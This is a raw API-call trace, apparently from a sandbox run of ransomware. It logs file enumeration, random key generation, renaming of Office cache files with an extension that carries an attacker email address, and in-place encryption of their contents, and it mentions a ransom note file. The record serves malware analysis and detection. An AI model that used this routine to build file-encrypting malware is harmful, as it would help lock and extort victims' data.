	[0082.810] FindNextFileW (in: hFindFile=0x5da330, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9eeba90, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9eeba90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9eeba90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0082.810] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbd88
	[0082.810] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0082.810] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0082.810] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0082.810] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0082.810] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST", dwFileAttributes=0x80) returned 1
	[0082.812] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 75
	[0082.812] GetProcessHeap () returned 0x540000
	[0082.812] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8568
	[0082.812] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST"
	[0082.812] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.12781717671972518758.ex_parvis@aol.com.AIR"
	[0082.812] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0082.814] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0082.814] GetProcessHeap () returned 0x540000
	[0082.814] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.814] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=3584) returned 1
	[0082.814] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xe00
	[0082.815] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0082.815] GetProcessHeap () returned 0x540000
	[0082.815] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0082.815] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0082.815] WriteFile (in: hFile=0x48c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0082.816] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0082.816] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0082.817] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe00) returned 0x5fdb78
	[0082.817] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe00) returned 0x5fe980
	[0082.817] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.817] ReadFile (in: hFile=0x48c, lpBuffer=0x5fdb78, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fdb78*, lpNumberOfBytesRead=0x3a1f778*=0xe00, lpOverlapped=0x0) returned 1
	[0082.817] SetFilePointer (in: hFile=0x48c, lDistanceToMove=-3584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.817] WriteFile (in: hFile=0x48c, lpBuffer=0x5fe980*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fe980*, lpNumberOfBytesWritten=0x3a1f778*=0xe00, lpOverlapped=0x0) returned 1
	[0082.817] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fdb78 | out: hHeap=0x540000) returned 1
	[0082.817] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fe980 | out: hHeap=0x540000) returned 1
	[0082.817] CloseHandle (hObject=0x48c) returned 1
	[0082.818] GetProcessHeap () returned 0x540000
	[0082.818] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.818] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0082.818] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0082.818] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbd88 | out: hHeap=0x540000) returned 1
	[0082.818] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbce0 | out: hHeap=0x540000) returned 1
	[0082.818] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbce0
	[0082.818] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0082.818] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0082.818] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0082.818] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0082.818] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0082.819] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0082.819] GetProcessHeap () returned 0x540000
	[0082.819] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5fdb78
	[0082.819] lstrcpyW (in: lpString1=0x5fdb78, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml"
	[0082.819] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0082.819] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0082.822] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0082.822] GetProcessHeap () returned 0x540000
	[0082.822] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fdb78 | out: hHeap=0x540000) returned 1
	[0082.822] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=9352) returned 1
	[0082.822] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x2488
	[0082.822] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0082.822] GetProcessHeap () returned 0x540000
	[0082.822] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0082.822] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0082.822] WriteFile (in: hFile=0x48c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0082.824] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0082.824] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0082.824] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2488) returned 0x5fdb78
	[0082.824] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2488) returned 0x600008
	[0082.824] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.824] ReadFile (in: hFile=0x48c, lpBuffer=0x5fdb78, nNumberOfBytesToRead=0x2488, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fdb78*, lpNumberOfBytesRead=0x3a1f778*=0x2488, lpOverlapped=0x0) returned 1
	[0082.825] SetFilePointer (in: hFile=0x48c, lDistanceToMove=-9352, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.825] WriteFile (in: hFile=0x48c, lpBuffer=0x600008*, nNumberOfBytesToWrite=0x2488, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x600008*, lpNumberOfBytesWritten=0x3a1f778*=0x2488, lpOverlapped=0x0) returned 1
	[0082.825] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fdb78 | out: hHeap=0x540000) returned 1
	[0082.825] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x600008 | out: hHeap=0x540000) returned 1
	[0082.825] CloseHandle (hObject=0x48c) returned 1
	[0082.826] GetProcessHeap () returned 0x540000
	[0082.826] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.826] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0082.826] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0082.826] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbce0 | out: hHeap=0x540000) returned 1
	[0082.826] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbc38 | out: hHeap=0x540000) returned 1
	[0082.826] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbc38
	[0082.826] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0082.826] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0082.826] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0082.826] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0082.826] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm", dwFileAttributes=0x80) returned 1
	[0082.827] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 73
	[0082.827] GetProcessHeap () returned 0x540000
	[0082.827] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5fdb78
	[0082.827] lstrcpyW (in: lpString1=0x5fdb78, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm"
	[0082.827] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.12781717671972518758.ex_parvis@aol.com.AIR"
	[0082.827] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0082.829] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0082.830] GetProcessHeap () returned 0x540000
	[0082.830] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fdb78 | out: hHeap=0x540000) returned 1
	[0082.830] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=67190) returned 1
	[0082.830] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x10676
	[0082.830] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0082.830] GetProcessHeap () returned 0x540000
	[0082.830] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0082.830] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0082.830] WriteFile (in: hFile=0x48c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0082.832] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0082.832] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0082.832] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10676) returned 0x5fdb78
	[0082.832] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10676) returned 0x60e1f8
	[0082.832] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.832] ReadFile (in: hFile=0x48c, lpBuffer=0x5fdb78, nNumberOfBytesToRead=0x10676, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fdb78*, lpNumberOfBytesRead=0x3a1f778*=0x10676, lpOverlapped=0x0) returned 1
	[0082.835] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0082.835] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0082.835] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm", dwFileAttributes=0x80) returned 1
	[0082.835] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 74
	[0082.835] GetProcessHeap () returned 0x540000
	[0082.835] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfa) returned 0x5b8568
	[0082.835] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm"
	[0082.835] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.12781717671972518758.ex_parvis@aol.com.AIR"
	[0082.835] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0082.837] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0082.837] GetProcessHeap () returned 0x540000
	[0082.837] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.837] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=27195) returned 1
	[0082.837] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x6a3b
	[0082.837] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0082.837] GetProcessHeap () returned 0x540000
	[0082.837] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0082.837] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0082.837] WriteFile (in: hFile=0x48c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0082.839] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0082.839] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0082.839] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x6a3b) returned 0x5fdb78
	[0082.839] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x6a3b) returned 0x6045c0
	[0082.839] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.839] ReadFile (in: hFile=0x48c, lpBuffer=0x5fdb78, nNumberOfBytesToRead=0x6a3b, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fdb78*, lpNumberOfBytesRead=0x3a1f778*=0x6a3b, lpOverlapped=0x0) returned 1
	[0082.839] SetFilePointer (in: hFile=0x48c, lDistanceToMove=-27195, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.840] WriteFile (in: hFile=0x48c, lpBuffer=0x6045c0*, nNumberOfBytesToWrite=0x6a3b, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x6045c0*, lpNumberOfBytesWritten=0x3a1f778*=0x6a3b, lpOverlapped=0x0) returned 1
	[0082.840] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fdb78 | out: hHeap=0x540000) returned 1
	[0082.841] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x6045c0 | out: hHeap=0x540000) returned 1
	[0082.841] CloseHandle (hObject=0x48c) returned 1
	[0082.842] GetProcessHeap () returned 0x540000
	[0082.842] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.842] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0082.842] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0082.842] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbb90 | out: hHeap=0x540000) returned 1
	[0082.842] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbad0 | out: hHeap=0x540000) returned 1
	[0082.842] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbb90
	[0082.842] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0082.842] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0082.842] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0082.842] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
